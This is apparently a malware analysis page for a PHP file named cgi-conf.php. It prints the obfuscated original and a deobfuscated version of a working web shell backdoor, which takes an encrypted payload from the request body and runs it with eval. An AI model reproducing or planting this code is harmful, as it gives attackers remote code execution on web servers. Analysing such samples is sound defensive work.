PHP Malware Analysis

Filename: cgi-conf.php

Tags

• base64_decode
• base64_encode

• eval

• _GET

• file_get_contents

Deobfuscated code

<?php

$N = 'k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W = 'base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u = 'nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p = 'or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
$g = "create_function";
$C = ';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y = '9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
$r = '$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
$k = "\$k=\"b5ef73cd\";\$kh=\"5ce24f921bbc\";\$kf=\"7fa689200ff0\";\$p=\"aOWo2okBR9FiQAlp\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$G = function () {
    $k = "b5ef73cd";
    $kh = "5ce24f921bbc";
    $kf = "7fa689200ff0";
    $p = "aOWo2okBR9FiQAlp";
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    if (@preg_match("/5ce24f921bbc(.+)7fa689200ff0/", @file_get_contents("php://input"), $m) == 1) {
        @ob_start();
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
$G();

Original code

<?php
$N='k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W='base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u='nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p='or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
$g=str_replace('uX','','cuXruXeauXte_uXfunuXcuXtion');
$C=';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y='9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
$r='$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
$k=str_replace('>','',$r.$Y.$p.$N.$u.$W.$C);
$G=$g('',$k);$G();
?>